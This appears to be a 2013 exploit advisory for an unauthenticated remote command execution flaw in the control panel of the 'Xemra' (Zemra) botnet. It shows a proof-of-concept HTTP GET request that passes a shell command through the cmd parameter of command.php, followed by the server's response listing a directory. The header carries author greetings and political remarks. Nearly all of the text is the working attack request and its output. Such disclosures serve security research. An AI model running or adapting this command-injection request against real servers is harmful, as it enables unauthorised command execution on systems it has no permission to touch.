########################################################################## # Exploit Title: Xemra Botnet Remote Code Execution Vulnerability # Date: 13.12.2013 # Exploit Author: GalaxyAndroid # Vendor Homepage: unkn0wn # Software Link: http://www.hackreports.com/2012/07/download-zemra-botnet-ddos-attack.html # Version: unknown # Tested on: Windows 7 with Xampp # greets goes to: ChrisKSK, Protestants in Ukraine -> keep pushing! # no greets to: NSA, GCHQ, USA, AUS, CAN, GBR, NZL #################################Exploit-Code################################### PoC execute dir Command. No authentication needed! ######### GET http://127.0.0.1/xemra/system/command.php?cmd=dir HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Cache-Control: max-age=0 ############ Response: HTTP/1.1 200 OK Date: Fri, 13 Dec 2013 18:29:42 GMT Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8 X-Powered-By: PHP/5.2.8 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 685 <h1>cmd</h1><pre> Datenträger in Laufwerk C: ist Verzeichnis von C:\xampp\htdocs\xemra\system 13.12.2013 19:16 <DIR> . 13.12.2013 19:16 <DIR> .. 18.04.2012 22:09 646 base.class.php 26.11.2011 13:47 88 command.php 18.05.2012 08:11 277 config.include.php 18.04.2012 22:09 1.348 database.class.php 13.12.2013 19:16 <DIR> geoip 18.04.2012 22:09 694 global.php 18.04.2012 22:09 1.725 session.class.php 6 Datei(en), 4.778 Bytes 3 Verzeichnis(se), 66.773.762.048 Bytes frei